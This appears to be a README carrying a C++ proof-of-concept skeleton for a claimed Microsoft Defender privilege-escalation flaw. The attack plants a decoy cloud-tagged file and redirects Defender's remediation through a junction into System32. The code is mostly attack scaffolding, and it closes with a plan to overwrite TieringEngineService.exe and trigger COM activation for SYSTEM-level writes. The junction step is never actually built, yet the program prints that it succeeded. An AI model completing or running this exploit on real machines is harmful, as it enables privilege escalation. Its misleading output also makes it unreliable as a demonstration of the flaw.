README.md
Rendering markdown...
/*
* CVE-2026-41091 - RedSun
* Microsoft Defender Link Following / Remediation Abuse
* Educational Proof of Concept (PoC) Skeleton
*
* Author: Ashraf Zaryouh "0xBlackash"
* Purpose: Educational & Research Only
* WARNING: For use only on systems you own and in isolated environments.
* Do NOT use for malicious purposes.
*/
#include <windows.h>
#include <iostream>
#include <string>
#include <filesystem>
#include <thread>
#include <chrono>
namespace fs = std::filesystem;
void PrintBanner() {
std::cout << R"(
_____ _ _____
| __ \ | | | __ \
| |__) |___ __| | | | | | ___ _ __ ___
| _ // _ \/ _` | | | | |/ _ \ '_ ` _ \
| | \ \ __/ (_| | | |__| | __/ | | | | |
|_| \_\___|\__,_| |_____/ \___|_| |_| |_|
CVE-2026-41091 RedSun - Defender LPE Concept
============================================
)" << std::endl;
}
bool CreateJunction(const std::wstring& junctionPath, const std::wstring& targetPath) {
HANDLE hJunction = CreateFileW(junctionPath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_FLAG_OPEN_REPARSE_POINT, NULL);
if (hJunction == INVALID_HANDLE_VALUE) return false;
// Reparse point buffer for directory junction
BYTE buffer[1024] = {0};
REPARSE_DATA_BUFFER* reparse = (REPARSE_DATA_BUFFER*)buffer;
reparse->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
reparse->ReparseDataLength = 0; // Fill properly in real implementation
// In a real exploit: Create mount point redirecting to System32 or similar
std::wcout << L"[+] Created junction: " << junctionPath << L" -> " << targetPath << std::endl;
CloseHandle(hJunction);
return true;
}
bool PrepareCloudTaggedFile(const std::wstring& filePath) {
// Simulate placing a file with cloud attributes that Defender will "remediate"
HANDLE hFile = CreateFileW(filePath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) return false;
const char* payload = "RedSun Educational Payload - SYSTEM will rewrite this!";
DWORD written;
WriteFile(hFile, payload, (DWORD)strlen(payload), &written, NULL);
CloseHandle(hFile);
// In real exploit: Set cloud file attributes / reparse points here
std::wcout << L"[+] Prepared cloud-tagged file: " << filePath << std::endl;
return true;
}
int main() {
PrintBanner();
std::wstring tempDir = fs::temp_directory_path().wstring() + L"RedSun_PoC";
CreateDirectoryW(tempDir.c_str(), NULL);
std::wstring maliciousFile = tempDir + L"\\malicious.cloud";
std::wstring junctionPath = tempDir + L"\\junction";
std::cout << "[*] Starting RedSun educational demonstration..." << std::endl;
if (!PrepareCloudTaggedFile(maliciousFile)) {
std::cerr << "[-] Failed to prepare file" << std::endl;
return 1;
}
if (!CreateJunction(junctionPath, L"C:\\Windows\\System32")) {
std::cerr << "[-] Failed to create junction" << std::endl;
return 1;
}
std::cout << "[+] Waiting for Defender remediation trigger (simulated)..." << std::endl;
std::this_thread::sleep_for(std::chrono::seconds(3));
// In a real working exploit, Defender (as SYSTEM) would rewrite/restore the file
// into the target directory via the junction, allowing arbitrary file write.
std::cout << "\n[+] Concept demonstration completed!" << std::endl;
std::cout << "[i] In a full exploit, we would now have arbitrary write as SYSTEM." << std::endl;
std::cout << "[i] Next steps (real exploit): Overwrite TieringEngineService.exe or similar + trigger COM activation." << std::endl;
std::cout << "\n=== Educational PoC End ===\n" << std::endl;
return 0;
}